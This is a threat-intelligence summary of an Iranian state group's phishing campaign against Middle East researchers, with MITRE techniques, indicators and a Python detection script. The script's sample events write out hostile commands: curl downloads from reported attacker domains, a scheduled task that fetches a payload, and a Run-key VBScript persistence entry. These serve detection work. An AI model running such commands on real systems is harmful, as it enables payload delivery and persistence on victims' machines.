Microsoft observed a technically mature Mint Sandstorm (PHOSPHORUS) subgroup targeting high-profile academics and researchers involved in Middle Eastern affairs across Belgium, France, Gaza, Israel, the UK, and the US, using bespoke phishing lures and social engineering. The campaign introduced new post-intrusion tradecraft, including a custom backdoor named MediaPl and additional backdoors like MischiefTut, with attackers sometimes leveraging legitimate but compromised accounts to increase credibility. #MintSandstorm #MediaPl #MischiefTut #APT35 #CharmingKitten #IRGC #IsraelHamasWar
Keypoints
- Targets are high-profile individuals (journalists, researchers, professors) with insights on security and policy issues of interest to Tehran.
- Attackers used bespoke phishing lures and social engineering, sometimes using compromised accounts to impersonate targets.
- Delivery follows a staged chain: malicious domain links leading to archives that deliver weaponized files, including .pdf.lnk and .vbs scripts.
- A new custom backdoor, MediaPl, and another backdoor, MischiefTut, were observed, with MediaPl masquerading as Windows Media Player and using encrypted C2 communications.
- Persistence techniques include VBScript in Run keys and scheduled tasks to fetch payloads from attacker-controlled domains.
- MITRE-relevant behaviors include spearphishing, tool transfer via curl, and PowerShell/VBScript-based payloads.
MITRE Techniques
- [T1566.003] Spearphishing via Service: "In some cases, the threat actor used legitimate but compromised email accounts belonging to the individuals they sought to impersonate."
- [T1566.002] Spearphishing Link: Follow-up messages directed targets to sites such as cloud-document-edit.onrender.com, a domain hosting a RAR archive (.rar) file that targets were asked to review.
- [T1105] Ingress Tool Transfer: The curl command was used to download a series of malicious files from attacker-controlled subdomains. "a curl command to retrieve a series of malicious files from attacker-controlled subdomains of glitch.me and supabase.co."
- [T1059.001] PowerShell: MischiefTut is a custom backdoor implemented in PowerShell with a set of basic capabilities.
- [T1059.005] VBScript: Persistence.vbs is used to persist and can add a file to the CurrentVersion\Run registry key.
- [T1547.001] Run Keys / Startup Folder: Persistence via the CurrentVersion\Run key using a.vbs.
- [T1053.005] Scheduled Task: Created to reach out to an attacker-controlled supabase.co domain and download a .txt file.
- [T1036] Masquerading: MediaPl is configured to masquerade as Windows Media Player.
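The tool-transfer, persistence and delivery behaviours listed above can be turned into host-side detections. The following is an added example, not code from Microsoft's report: a small rule set in Python run over constructed Sysmon-style events (process creation, registry value set, file create). Field names follow Sysmon conventions; the local paths and URL paths are placeholders, while the domains and file names come from the report.

```python
import re

# Domains and artefact names taken from the report; every event below is constructed.
REPORTED_DOMAINS = ("glitch.me", "supabase.co", "cloud-document-edit.onrender.com")
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
DOUBLE_EXT_RE = re.compile(r"\.pdf\.lnk$", re.IGNORECASE)


def check_event(ev):
    """Return the names of the report-derived rules that one Sysmon-style event matches."""
    hits = []
    kind = ev.get("EventType")
    cmd = ev.get("CommandLine", "").lower()
    image = ev.get("Image", "").lower()
    if kind == "ProcessCreate":
        # T1105: curl fetching from a glitch.me / supabase.co / onrender.com host
        if image.endswith("curl.exe") and any(d in cmd for d in REPORTED_DOMAINS):
            hits.append("curl_download_from_reported_domain")
        # T1053.005: scheduled task whose action reaches out to supabase.co
        if image.endswith("schtasks.exe") and "/create" in cmd and "supabase.co" in cmd:
            hits.append("scheduled_task_fetch_from_supabase")
    elif kind == "RegistryValueSet":
        # T1547.001: Run key value pointing at a .vbs (Persistence.vbs / a.vbs)
        if RUN_KEY_RE.search(ev.get("TargetObject", "")) and ".vbs" in ev.get("Details", "").lower():
            hits.append("run_key_vbscript_persistence")
    elif kind == "FileCreate":
        # Delivery stage: double-extension shortcut such as report.pdf.lnk
        if DOUBLE_EXT_RE.search(ev.get("TargetFilename", "")):
            hits.append("double_extension_lnk")
    return hits


def scan(events):
    """Run every rule over a list of events; returns (event id, rule name) pairs."""
    return [(ev["Id"], hit) for ev in events for hit in check_event(ev)]


SAMPLE_EVENTS = [  # constructed; paths and URL paths are placeholders, domains are from the report
    {"Id": 1, "EventType": "ProcessCreate", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\v\AppData\Local\Temp\documentLoger.txt "
                    "https://ndrrftqrlblfecpupppp.supabase.co/constructed/path.txt"},
    {"Id": 2, "EventType": "RegistryValueSet",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\a",
     "Details": r"wscript.exe C:\Users\v\AppData\Roaming\a.vbs"},
    {"Id": 3, "EventType": "ProcessCreate", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks.exe /create /sc minute /mo 30 /tn Update /tr "curl '
                    'https://kwhfibejjyxregxmnpcs.supabase.co/constructed/file.txt"'},
    {"Id": 4, "EventType": "FileCreate", "TargetFilename": r"C:\Users\v\Downloads\report.pdf.lnk"},
    {"Id": 5, "EventType": "ProcessCreate", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe https://example.com/"},  # benign, must not alert
]
```

Running `scan(SAMPLE_EVENTS)` flags events 1 to 4 with one rule each and leaves the benign curl call (event 5) untouched.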
Indicators of Compromise
- [Domains] Targeting domains observed: east-healthy-dress.glitch.me, coral-polydactyl-dragonfruit.glitch.me, kwhfibejjyxregxmnpcs.supabase.co, epibvgvoszemkwjnplyc.supabase.co, ndrrftqrlblfecpupppp.supabase.co, cloud-document-edit.onrender.com
- [Files] MediaPl.dll (SHA-256: f2dec56acef275a0e987844e98afcc44bf8b83b4661e83f89c6a2a72c5811d5f); documentLoger.txt